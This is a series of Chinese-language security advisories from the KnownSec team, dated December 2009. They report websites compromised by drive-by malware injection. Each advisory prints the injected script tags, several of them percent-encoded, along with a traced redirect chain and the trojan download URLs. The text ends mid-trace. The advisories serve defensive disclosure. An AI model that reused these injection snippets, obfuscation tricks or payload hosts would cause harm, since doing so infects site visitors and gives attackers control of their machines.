知道创宇

发布时间：Mon Dec 28 2009 19:51:52 UTC+0800
最后更新时间：Mon Dec 28 2009 19:51:52 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：北京大学外国哲学研究所
网站链接：http://www.ifp.pku.edu.cn/
恶意代码：
<script src=http://a.ll8cc.cn></script>
所在页面：http://www.ifp.pku.edu.cn/
下载病毒：
http://fuck.ss.la/4.exe
http://tj.7766.org/h.exe
其他机构判定结果：
google:恶意

网站名称：星之盒子
网站链接：http://star-box.cn/
恶意代码：
<script src=http://asa.ss.la/1.js></script>
所在页面：http://star-box.cn/
下载病毒：
http://fuck.ss.la/4.exe
http://tj.7766.org/h.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/

推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您是以上网站的管理员，请尽快清除恶意代码，以免更多的用户受到威胁，影响用户的访问感受，损害网站的形象。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 8% [?]

发布时间：Sun Dec 27 2009 22:38:44 UTC+0800
最后更新时间：Sun Dec 27 2009 22:38:44 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）今日监测到以下网站被植入恶意代码，用户访问以下挂马页面可能被安装木马病毒等恶意程序，导致敏感信息泄露甚至电脑被黑客控制。

网站名称：千寻网
网站链接：http://www.qooxoo.com/
恶意代码：
document.writeln (”<script src=\”http://k45mm.3322.org/googl%65.js\”><\/script>”);
document.writeln (”<script src=\”http://sbsbsb.7766.org/3%32.js\”><\/script>”);
document.writeln (”<script src=\”http://sbsbsb.7766%2Eorg/32.js\”><\/script>”);
所在页面：http://www.qooxoo.com/js/common.js
下载病毒：
http://viper.8gcc.com/down/my/39.exe
其他机构判定结果：
google:安全

网站名称：才经网
网站链接：http://www.ttvcn.com/
恶意代码：
<script src=http://%61%2E%70%70%6D%6D%6F%6F%2E%63%6E></script>
所在页面：http://www.ttvcn.com/
下载病毒：
http://fuck.ss.la/4.exe
http://tj.7766.org/h.exe
http://tv.ismydns.com.cn:8288/css/upload.css
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/kk18_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/quliao_baidu.exe
其他机构判定结果：
google:恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/

推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您是以上网站的管理员，请尽快清除恶意代码，以免更多的用户受到威胁，影响用户的访问感受，损害网站的形象。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

Popularity: 9% [?]

发布时间：Fri Dec 25 2009 19:51:25 UTC+0800
最后更新时间：Fri Dec 25 2009 19:51:25 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 湖南广播电视大学（http://www.hnrtu.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.hnrtu.edu.cn/xyl

网页被嵌入恶意链接代码：
<script src=http://%61%2E%70%70%6D%6D%6F%6F%2E%63%6E></script>

挂马分析：
[root]http://www.hnrtu.edu.cn/xyl
    [script]http://a.ppmmoo.cn
        [iframe]http://8884.ss.la/445/ad.htm
            [iframe]http://8884.ss.la/445/gvff.htm
                [exe]http://fuck.ss.la/4.exe
            [iframe]http://8884.ss.la/445/gv14.htm
                [exe]http://fuck.ss.la/4.exe
            [iframe]http://8884.ss.la/445/gvgg.htm
                [script]http://8884.ss.la/445/ruixing.js
                    [exe]http://fuck.ss.la/4.exe
            [iframe]http://8884.ss.la/445/gvbf.htm
                [script]http://8884.ss.la/445/baozi.js
                    [exe]http://fuck.ss.la/4.exe
            [iframe]http://8884.ss.la/445/gv122122.htm
            [iframe]http://8884.ss.la/445/gv122121.htm
                [exe]http://fuck.ss.la/4.exe
            [iframe]http://8884.ss.la/445/gvxxz.htm
                [exe]http://fuck.ss.la/4.exe
            [iframe]http://8884.ss.la/445/gvfl.htm
                [iframe]http://8884.ss.la/445/gv11.html
                    [script]http://8884.ss.la/445/swfobject.js
                    [flash]http://8884.ss.la/445/./gg115.swf
                        [exe]http://tj.7766.org/h.exe
                    [flash]http://8884.ss.la/445/./gg47.swf
                    [flash]http://8884.ss.la/445/./gg16.swf
                    [flash]http://8884.ss.la/445/./gg45.swf
                    [flash]http://8884.ss.la/445/./gg64.swf
                    [flash]http://8884.ss.la/445/./gg28.swf
                [iframe]http://8884.ss.la/445/gv22.html
                    [script]http://8884.ss.la/445/swfobject.js
                    [flash]http://8884.ss.la/445/./vv115.swf
                    [flash]http://8884.ss.la/445/./vv28.swf
                    [flash]http://8884.ss.la/445/./vv16.swf
                    [flash]http://8884.ss.la/445/./vv45.swf
                    [flash]http://8884.ss.la/445/./vv64.swf
                    [flash]http://8884.ss.la/445/./vv47.swf
                [iframe]http://8884.ss.la/445/gv11.html
            [iframe]http://8884.ss.la/445/gvcx.htm
                [script]http://8884.ss.la/445/cx.js
                    [exe]http://fuck.ss.la/4.exe
            [iframe]http://8884.ss.la/445/i7.htm
                [exe]http://fuck.ss.la/4.exe
        [iframe]http://www.sesesemml.cn/?c0713665
        [iframe]http://a.mmzfc.cn/zz/a.htm?c0713665
        [iframe]http://a.mmzfc.cn/zz/11.htm?c0713665
            [iframe]http://ersyrt5h.7766.org/web/40/index.html
                [script]http://ersyrt5h.7766.org/web/40/a.jpg
                [script]http://ersyrt5h.7766.org/web/40/c.jpg
                [script]http://ersyrt5h.7766.org/web/40/d.css
                [script]http://ersyrt5h.7766.org/web/40/e.jpg
                [script]http://ersyrt5h.7766.org/web/40/f.css
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
        [iframe]http://a.ppmmoo.cn/tj.htm
            [iframe]http://yuandan004.3322.org/web/2/index.html
            [iframe]http://yuandan006.3322.org/web/2/index.html
                [script]http://yuandan006.3322.org/web/2/a.jpg
                    [exe]http://viper.8gcc.com/down/my/2.exe
                [script]http://yuandan006.3322.org/web/2/c.jpg
                [script]http://yuandan006.3322.org/web/2/d.css
                [script]http://yuandan006.3322.org/web/2/e.jpg
                [script]http://yuandan006.3322.org/web/2/f.css

最终下载病毒文件：
http://fuck.ss.la/4.exe
http://tj.7766.org/h.exe
http://viper.8gcc.com/down/my/2.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：21
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

发布时间：Fri Dec 25 2009 19:37:15 UTC+0800
最后更新时间：Fri Dec 25 2009 19:37:15 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 博艺艺考网（http://www.byyk114.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.byyk114.cn/inc/date.js

网页被嵌入恶意链接代码：
document.writeln (”<script src=\”http://k43m%6D.3322.org/google.js\”><\/script>”);

挂马分析：
[root]http://www.byyk114.cn/
    [script]http://www.byyk114.cn/inc/date.js
        [script]http://k43mm.3322.org/google.js
            [iframe]http://sabisabi13.3322.org/web/39/index.html
                [script]http://sabisabi13.3322.org/web/39/a.jpg
                    [exe]http://viper.8gcc.com/down/my/39.exe
                [script]http://sabisabi13.3322.org/web/39/c.jpg
                [script]http://sabisabi13.3322.org/web/39/d.css
                [script]http://sabisabi13.3322.org/web/39/e.jpg
                [script]http://sabisabi13.3322.org/web/39/f.css

最终下载病毒文件：
http://viper.8gcc.com/down/my/39.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：3
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

发布时间：Thu Dec 24 2009 21:30:44 UTC+0800
最后更新时间：Thu Dec 24 2009 21:30:44 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国小说下载站（http://www.xiaoyouxi.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.xiaoyouxi.cn/

网页被嵌入恶意链接代码：
http://www.cndownz.com/adfile/top875.js

挂马分析：
[root]http://www.cndownz.com/ask/internet/other/186572.html
    [script]http://www.cndownz.com/adfile/top875.js
        [script]http://www.52ylxx.cn/js/3.js?31
            [iframe]http://7qusi.3322.org/web/10/index.html?bb
                [script]http://7qusi.3322.org/web/10/a.jpg
                    [exe]http://gova.eloec.com/down/my/11.exe
                [script]http://7qusi.3322.org/web/10/c.jpg
                [script]http://7qusi.3322.org/web/10/d.css
                [script]http://7qusi.3322.org/web/10/e.jpg
                [script]http://7qusi.3322.org/web/10/f.css

最终下载病毒文件：
http://gova.eloec.com/down/my/11.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：55
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

发布时间：Thu Dec 24 2009 00:55:50 UTC+0800
最后更新时间：Thu Dec 24 2009 00:55:50 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 中国问路网（http://wenluwang.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://wenluwang.com/

网页被嵌入恶意链接代码：
<script language=javascript src=http://ne%62.xo%72g.%70l/c.js?google_ad=11×109_ad></script>

挂马分析：
Log generated by issmall use mdecoder 0.32
[root]http://wenluwang.com/
    [script]http://neb.xorg.pl/c.js?google_ad=11×109_ad
        [iframe]http://xxi.ss.la/19/159sd.htm
            [iframe]http://xxi.ss.la/19/av.htm
                [iframe]http://xxi.ss.la/19/mp.htm
                    [script]http://xxi.ss.la/19/ll.jpg
                    [script]http://xxi.ss.la/19/ll1.jpg
                    [script]http://xxi.ss.la/19/upp.jpg
                        [exe]http://xxi.ss.la/l/jj.exe
                    [script]http://xxi.ss.la/19/llll1.jpg
                    [script]http://xxi.ss.la/19/llll.jpg
                    [script]http://xxi.ss.la/19/lllll.jpg
                [iframe]http://xxi.ss.la/19/nod.htm
                    [iframe]http://xxi.ss.la/19/lz.htm
                        [script]http://xxi.ss.la/19/oopk.jpg
                        [script]http://xxi.ss.la/19/ll1.jpg
                        [script]http://xxi.ss.la/19/lz.jpg
                [iframe]http://xxi.ss.la/19/real.htm
                    [iframe]http://xxi.ss.la/19/myra.htm
                        [script]http://xxi.ss.la/19/myr.jpg
                            [exe]http://xxi.ss.la/l/jj.exe
                [iframe]http://xxi.ss.la/19/rising.htm
                    [iframe]http://xxi.ss.la/19/ofnt.htm
                        [script]http://xxi.ss.la/19/oopk.jpg
                            [exe]http://xxi.ss.la/l/jj.exe
                        [script]http://xxi.ss.la/19/uug.jpg
            [script]http://xxi.ss.la/19/fa.js
                [iframe]http://xxi.ss.la/19/fla.htm
                    [iframe]http://xxi.ss.la/19/ff.html
                    [iframe]http://xxi.ss.la/19/ie.html
                    [iframe]http://xxi.ss.la/19/ff.html
                    [iframe]http://xxi.ss.la/19/ie.html
                    [iframe]http://xxi.ss.la/19/ff.html
                    [iframe]http://xxi.ss.la/19/ff.html
    [iframe]http://2xiangyang.cn/14/zz.htm
        [iframe]http://l1.dnparking.com/main.php?d=2xiangyang.cn
    [iframe]http://2xiangyang.cn/14/zz.htm
    [iframe]http://bsdying.cn/14/zz.htm
        [iframe]http://l1.dnparking.com/main.php?d=bsdying.cn
    [script]http://neb.xorg.pl/c.js?google_ad=11×109_ad
最终下载病毒文件：
http://xxi.ss.la/l/jj.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：19
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

发布时间：Mon Dec 21 2009 22:19:17 UTC+0800
最后更新时间：Mon Dec 21 2009 22:19:17 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 92逛街网（http://www.92guang.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.92guang.com/

网页被嵌入恶意链接代码：
<script language=javascript src=http://h%66b.x%6Frg.%70l/c.js?google_ad=12×421_ad></script>

挂马分析：
Log generated by issmall use mdecoder 0.31
[root]http://www.92guang.com/
    [script]http://hfb.xorg.pl/c.js?google_ad=12×421_ad
        [iframe]http://pdk.lcn.cc/16/155sd.htm
            [iframe]http://pdk.lcn.cc/16/av.htm
                [iframe]http://pdk.lcn.cc/16/mp.htm
                    [script]http://pdk.lcn.cc/16/ll.jpg
                    [script]http://pdk.lcn.cc/16/ll1.jpg
                    [script]http://pdk.lcn.cc/16/upp.jpg
                        [exe]http://pdk.lcn.cc/l/gg.exe
                    [script]http://pdk.lcn.cc/16/llll1.jpg
                    [script]http://pdk.lcn.cc/16/llll.jpg
                    [script]http://pdk.lcn.cc/16/lllll.jpg
                [iframe]http://pdk.lcn.cc/16/nod.htm
                    [iframe]http://pdk.lcn.cc/16/lz.htm
                        [script]http://pdk.lcn.cc/16/oopk.jpg
                            [exe]http://pdk.lcn.cc/l/gg.exe
                        [script]http://pdk.lcn.cc/16/ll1.jpg
                        [script]http://pdk.lcn.cc/16/lz.jpg
                [iframe]http://pdk.lcn.cc/16/real.htm
                    [iframe]http://pdk.lcn.cc/16/myra.htm
                        [script]http://pdk.lcn.cc/16/myr.jpg
                            [exe]http://pdk.lcn.cc/l/gg.exe
                [iframe]http://pdk.lcn.cc/16/rising.htm
                    [iframe]http://pdk.lcn.cc/16/ofnt.htm
                        [script]http://pdk.lcn.cc/16/oopk.jpg
                        [script]http://pdk.lcn.cc/16/uug.jpg
            [script]http://pdk.lcn.cc/16/fa.js
                [iframe]http://pdk.lcn.cc/16/fla.htm
                    [iframe]http://pdk.lcn.cc/16/ff.html
                    [iframe]http://pdk.lcn.cc/16/ie.html
                    [iframe]http://pdk.lcn.cc/16/ff.html
                    [iframe]http://pdk.lcn.cc/16/ie.html
                    [iframe]http://pdk.lcn.cc/16/ff.html
                    [iframe]http://pdk.lcn.cc/16/ff.html
    [script]http://www.92guang.com/counter/count.asp?style=0
    [script]http://js.users.51.la/1774684.js
    [script]http://hfb.xorg.pl/c.js?google_ad=12×421_ad
最终下载病毒文件：
http://pdk.lcn.cc/l/gg.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：2
Google对该网站的判定：安全

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

发布时间：Sun Dec 20 2009 16:14:24 UTC+0800
最后更新时间：Sun Dec 20 2009 16:14:24 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 火爆漫画吧（http://www.acgba.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://comic.acgba.com/

网页被嵌入恶意链接代码：
<script src=http://a.ll8cc.cn></script>

挂马分析：
Log generated by issmall use mdecoder 0.31
[root]http://comic.acgba.com/
    [script]http://a.ll8cc.cn
        [iframe]http://8884.ss.la/4/google.htm
            [iframe]http://8884.ss.la/4/search.htm
                [script]http://8884.ss.la/4/google_ad.js
                    [iframe]http://8884.ss.la/4/cqqmp.htm
                        [script]http://8884.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://8884.ss.la/4/show.jpg
                        [script]http://8884.ss.la/4/shows.jpg
                [script]http://8884.ss.la/4/google_ads.js
                    [iframe]http://8884.ss.la/4/ec1.htm
                        [script]http://8884.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://8884.ss.la/4/fyfl.htm
                    [iframe]http://8884.ss.la/4/ecof.htm
                        [script]http://8884.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://8884.ss.la/4/fydvd.htm
                    [iframe]http://8884.ss.la/4/fycry.htm
                        [script]http://8884.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://8884.ss.la/4/google_adx.js
                    [iframe]http://8884.ss.la/4/cqq0.htm
                        [script]http://8884.ss.la/4/cqq2s.css
                        [script]http://8884.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://8884.ss.la/4/ecb.htm
                        [iframe]http://8884.ss.la/4/ecbbb.htm
                            [script]http://8884.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://8884.ss.la/4/fyr.htm
                        [script]http://8884.ss.la/4/rr.js
                            [iframe]http://8884.ss.la/4/evilr.htm
                                [script]http://8884.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://8884.ss.la/4/fyre1.htm
                                [script]http://8884.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://8884.ss.la/4/zz.js
                            [iframe]http://8884.ss.la/4/fylz.htm
                                [script]http://8884.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://8884.ss.la/4/ecfox.htm
                        [iframe]http://8884.ss.la/4/ecffx.htm
                            [script]http://8884.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://8884.ss.la/4/music.js
                    [iframe]http://8884.ss.la/4/sfpf.htm
                    [iframe]http://8884.ss.la/4/ax.htm
                        [exe]http://8884.ss.la/4.exe
        [iframe]http://www.sesesemml.cn/?43181199
            [iframe]http://sdf454gdf.3322.org/xp/360.html?chunjie123
                [iframe]http://sdf454gdf.3322.org/xp/yt.htm
                    [script]http://sdf454gdf.3322.org/xp/nop.jpg
                    [script]http://sdf454gdf.3322.org/xp/ml.jpg
                    [script]http://sdf454gdf.3322.org/xp/rl.jpg
                        [exe]http://dl7900.3322.org/xp/1.css
                    [script]http://sdf454gdf.3322.org/xp/kl.jpg
                [iframe]http://sdf454gdf.3322.org/xp/ytu.htm
                    [iframe]http://sdf454gdf.3322.org/xp/of.htm
                        [script]http://sdf454gdf.3322.org/xp/rl.jpg
                        [script]http://sdf454gdf.3322.org/xp/nop.jpg
                        [script]http://sdf454gdf.3322.org/xp/fq.jpg
            [script]http://www.sesesemml.cn/dl1.js
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://www.sesesemml.cn/baidu_10.exe
                [exe]http://tg.01lm.com/kk18_baidu.exe
                [exe]http://tg.01lm.com/paopao8_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://122.227.42.206:8080/qliao_baidu.exe
                [exe]http://tg.01lm.com/quliao_baidu.exe
            [iframe]http://www.sesesemml.cn/images/mv.htm
                [script]http://www.sesesemml.cn/images/mv.files/flash_mv.js
            [iframe]http://www.sesesemml.cn/images/float_baidu.htm
                [script]http://www.sesesemml.cn/images/float_baidu.files/yui-utilities.js
                    [script]http://:
                [script]http://www.sesesemml.cn/images/float_baidu.files/tbra.js
                    [script]http://www.sesesemml.cn/images/float_baidu.files/locale/+
                [script]http://www.sesesemml.cn/images/dl2.js
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
                    [exe]http://www.sesesemml.cn/baidu_10.exe
        [iframe]http://a.mmzfc.cn/zz/a.htm?43181199
            [iframe]http://dddertsa.8866.org/auto/imgasp/asp.html?za
        [iframe]http://a.mmzfc.cn/zz/11.htm?43181199
            [iframe]http://a.0770sw.cn/web/4/index.html?a
                [script]http://a.0770sw.cn/web/4/a.jpg
                    [exe]http://go.moxii.cn/ext/my/4.exe
                [script]http://a.0770sw.cn/web/4/c.jpg
                [script]http://a.0770sw.cn/web/4/d.css
                [script]http://a.0770sw.cn/web/4/e.jpg
                [script]http://a.0770sw.cn/web/4/f.css
        [iframe]http://fffsder.7766.org/htmlasp/imgasp/asp.html?z2
        [iframe]http://a.ppmmoo.cn/tj.htm
 

最终下载病毒文件：
http://go.moxii.cn/ext/my/4.exe
http://www.sesesemml.cn/baidu_10.exe
http://tg.01lm.com/quliao_baidu.exe
http://122.227.42.206:8080/qliao_baidu.exe
http://tg.01lm.com/paopao8_baidu.exe
http://tg.01lm.com/kk18_baidu.exe
http://dl7900.3322.org/xp/1.css
http://8884.ss.la/4.exe
http://fuck.ss.la/4.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：5
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

发布时间：Sat Dec 19 2009 17:10:18 UTC+0800
最后更新时间：Sat Dec 19 2009 17:10:18 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 智能手机中国（http://www.wdacn.com/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://html.wdacn.com/inctop.asp

网页被嵌入恶意链接代码：
<script src=http://8889.ss.la></script><script src=http://z360%2Enet/c.js></script><script src=http://z360%2Enet/c.js></script>

挂马分析：
Log generated by issmall use mdecoder 0.31
[root]http://www.wdacn.com/
    [iframe]http://html.wdacn.com/inctop.asp
        [script]http://z360.ne
        [script]http://8889.ss.la
        [script]http://z360.net/c.js
            [iframe]http://7o8.net/a.htm
                [iframe]http://go.moxii.cn/web/13/index.html
                    [script]http://go.moxii.cn/web/13/a.jpg
                        [exe]http://go.moxii.cn/ext/my/13.exe
                    [script]http://go.moxii.cn/web/13/c.jpg
                    [script]http://go.moxii.cn/web/13/d.css
                    [script]http://go.moxii.cn/web/13/e.jpg
                    [script]http://go.moxii.cn/web/13/f.css

最终下载病毒文件：
http://go.moxii.cn/ext/my/13.exe

通过执行以上病毒文件，来达到完全控制访问者的系统。

 该网站历史挂马次数：37
Google对该网站的判定：恶意

知道安全提醒网民，要做好安全防护，避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马，也可向国家互联网应急中心举报。 国家互联网应急中心：http://www.cert.org.cn/
推荐的应对方法：
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果，如果使用我们数据的请通知我们一下，我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们：
邮箱：sec@knownsec.com或sec@scanw.com

知道创宇：专业的WEB安全公司   www.knownsec.com

Popularity: 7% [?]

发布时间：Fri Dec 18 2009 20:07:12 UTC+0800
最后更新时间：Fri Dec 18 2009 20:07:12 UTC+0800
________________________________________
知道创宇安全团队（KnownSec Team）于今天捕获 南京邮电大学（http://www.njupt.edu.cn/）被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://xyh.njupt.edu.cn/

网页被嵌入恶意链接代码：
<script src=http://a.ll8cc.cn></script>

挂马分析：
Log generated by issmall use mdecoder 0.31
[root]http://xyh.njupt.edu.cn/
    [script]http://a.ll8cc.cn
        [iframe]http://c.8883.ss.la/4/google.htm
            [iframe]http://c.8883.ss.la/4/search.htm
                [script]http://c.8883.ss.la/4/google_ad.js
                    [iframe]http://c.8883.ss.la/4/cqqmp.htm
                        [script]http://c.8883.ss.la/4/cqqskin.css
                            [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/show.jpg
                        [script]http://c.8883.ss.la/4/shows.jpg
                [script]http://c.8883.ss.la/4/google_ads.js
                    [iframe]http://c.8883.ss.la/4/ec1.htm
                        [script]http://c.8883.ss.la/4/ec4.js
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyfl.htm
                    [iframe]http://c.8883.ss.la/4/ecof.htm
                        [script]http://c.8883.ss.la/4/off.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fydvd.htm
                    [iframe]http://c.8883.ss.la/4/fycry.htm
                        [script]http://c.8883.ss.la/4/cry.css
                            [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/google_adx.js
                    [iframe]http://c.8883.ss.la/4/cqq0.htm
                        [script]http://c.8883.ss.la/4/cqq2s.css
                        [script]http://c.8883.ss.la/4/cqq2.css
                            [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecb.htm
                        [iframe]http://c.8883.ss.la/4/ecbbb.htm
                            [script]http://c.8883.ss.la/4/ecfff.js
                                [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/fyr.htm
                        [script]http://c.8883.ss.la/4/rr.js
                            [iframe]http://c.8883.ss.la/4/evilr.htm
                                [script]http://c.8883.ss.la/4/evilrr.js
                                    [exe]http://fuck.ss.la/4.exe
                            [iframe]http://c.8883.ss.la/4/fyre1.htm
                                [script]http://c.8883.ss.la/4/fyr1.js
                                    [exe]http://fuck.ss.la/4.exe
                        [script]http://c.8883.ss.la/4/zz.js
                            [iframe]http://c.8883.ss.la/4/fylz.htm
                                [script]http://c.8883.ss.la/4/xxxxz.js
                                    [exe]http://fuck.ss.la/4.exe
                    [iframe]http://c.8883.ss.la/4/ecfox.htm
                        [iframe]http://c.8883.ss.la/4/ecffx.htm
                            [script]http://c.8883.ss.la/4/ecfox.js
                                [exe]http://fuck.ss.la/4.exe
                [script]http://c.8883.ss.la/4/music.js
                    [iframe]http://c.8883.ss.la/4/sfpf.htm
        [iframe]http://www.sesesemml.cn/?51237957
            [iframe]http://df4554fer.3322.org/xp/360.html?chunjie123
                [iframe]http://df4554fer.3322.org/xp/yt.htm
                    [script]http://df4554fer.3322.org/xp/nop.jpg
                    [script]http://df4554fer.3322.org/xp/ml.jpg
